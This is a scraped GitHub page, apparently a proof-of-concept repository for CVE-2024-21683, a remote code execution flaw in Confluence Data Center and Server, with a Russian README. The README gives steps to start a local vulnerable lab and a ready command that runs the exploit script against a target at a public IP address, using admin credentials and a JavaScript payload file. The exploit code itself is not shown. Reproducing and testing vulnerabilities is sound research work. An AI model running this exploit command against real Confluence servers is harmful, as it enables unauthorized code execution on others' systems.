CVE-2024-21683

21 мая 2024 года была зарегистрирована уязвимость в Confluence Data Center and Server, получившая номер CVE-2024-21683, а также высокий балл 8.3 по метрике CVSS.

Данная уязвимость позволяет авторизованному пользователю с наличием глобального права доступа System Administrator осуществить выполнение произвольного кода.

Запуск проекта

# Переход в директорию для запуска сервиса
cd confluence

# Копирование переменных окружения
cp .env.example .env 

# Запуск проекта
make run

# Переход в корень рабочей директории
cd ..

Запуск эксплойта

# Загрузка зависимостей
poetry install

# Запуск экслойта
poetry run python3 CVE-2024-21683.py -t http://84.201.163.5:8090 -u admin -p HardP@ssw0rd\! -f ./exp.js

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
confluence		confluence
nuclei-templates		nuclei-templates
.gitignore		.gitignore
CVE-2024-21683.py		CVE-2024-21683.py
README.md		README.md
exp.js		exp.js
poetry.lock		poetry.lock
pyproject.toml		pyproject.toml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-21683

Запуск проекта

Запуск эксплойта

About

Releases

Packages

Languages

xh4vm/CVE-2024-21683

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-21683

Запуск проекта

Запуск эксплойта

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages